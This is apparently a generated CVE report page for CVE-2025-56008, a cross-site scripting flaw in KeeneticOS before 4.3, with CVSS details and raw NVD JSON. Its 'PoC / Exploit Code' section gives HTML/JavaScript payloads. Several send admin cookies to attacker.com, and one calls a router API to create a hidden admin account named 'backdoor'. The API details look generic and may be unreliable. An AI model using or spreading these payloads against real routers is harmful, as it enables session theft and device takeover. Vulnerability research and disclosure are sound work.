Security Vulnerability Report
CVE-2025-56008 CVSS 6.1 MEDIUM

Published: 2025-10-23 15:15:39
Last Modified: 2026-05-20 20:16:35

Description

Cross-site scripting (XSS) vulnerability in KeeneticOS before 4.3 on the "Wireless ISP" page allows attackers located near the router to take over the device by adding additional users with full permissions.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:keenetic:keeneticos:*:*:*:*:*:*:*:* - VULNERABLE
KeeneticOS < 4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-56008 XSS PoC for KeeneticOS Wireless ISP page -->
<!-- This PoC demonstrates injecting malicious JavaScript via Wireless ISP configuration -->

<!-- Basic XSS payload to steal admin cookies -->
<script>
fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
</script>

<!-- Alternative payload using img tag for cookie theft -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));">

<!-- Payload to create admin user via KeeneticOS API -->
<script>
fetch('/usr/a', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    method: 'add_user',
    params: {username: 'backdoor', password: 'P@ssw0rd123', role: 'admin'}
  })
});
</script>

<!-- Stored XSS payload for persistent access -->
<svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56008", "sourceIdentifier": "[email protected]", "published": "2025-10-23T15:15:39.213", "lastModified": "2026-05-20T20:16:35.107", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross site scripting (XSS) vulnerability in KeeneticOS before 4.3 at \"Wireless ISP\" page allows attackers located near to the router to takeover the device via adding additional users with full permissions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:keenetic:keeneticos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3", "matchCriteriaId": "31463ACE-A8BB-4E5D-AA71-1BC479DE8AA4"}]}]}], "references": [{"url": "https://github.com/notdenied/writeups/blob/main/CVE/CVE-2025-56008.md", "source": "[email protected]"}, {"url": "https://keenetic.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://keenetic.com/global/security#october-2025-web-api-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}